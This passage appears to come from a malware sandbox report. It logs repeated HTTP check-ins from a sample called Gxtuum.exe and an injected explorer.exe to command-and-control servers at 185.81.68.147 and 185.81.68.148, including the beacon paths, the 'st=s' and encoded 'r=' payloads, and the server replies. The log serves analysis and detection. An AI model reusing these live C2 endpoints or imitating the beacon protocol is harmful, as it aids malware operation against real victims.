                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:20.080003977 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:19 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                67192.168.2.1149988185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:18.747844934 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:20.082040071 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:19 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                68192.168.2.1149992185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:20.010216951 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:20.130034924 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:21.455694914 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:20 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                69192.168.2.1149996185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:21.680393934 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:21.800165892 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:23.306274891 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:22 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                70192.168.2.1149998185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:21.807707071 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:23.121488094 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:22 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                71192.168.2.1149999185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:21.807735920 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:23.159133911 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:22 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                72192.168.2.1150003185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:23.538635015 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:23.658400059 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:25.134423018 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:24 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                73192.168.2.1150006185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:24.992815971 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:26.302354097 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:25 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                74192.168.2.1150007185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:24.992924929 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:26.314382076 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:25 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                75192.168.2.1150010185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:25.366919994 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:25.486934900 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:26.961940050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:26 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                76192.168.2.1150013185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:27.212013960 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:27.332889080 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:28.816076994 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:27 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                77192.168.2.1150017185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:28.102502108 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:29.361918926 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:28 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                78192.168.2.1150018185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:28.102727890 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:29.379689932 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:28 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                79192.168.2.1150020185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:29.038815022 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:29.159308910 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:30.632433891 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:29 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                80192.168.2.1150025185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:30.867296934 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:30.987366915 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:32.304833889 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:31 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                81192.168.2.1150026185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:31.224272013 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:32.564805984 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:31 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                82192.168.2.1150028185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:31.354989052 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:32.688888073 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:31 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                83192.168.2.1150030185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:32.538599968 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:32.658493042 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:34.150299072 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:33 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                84192.168.2.1150035185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:34.382735014 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:34.502512932 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:35.995721102 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:35 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                85192.168.2.1150036185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:34.449744940 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:35.799340010 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:35 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
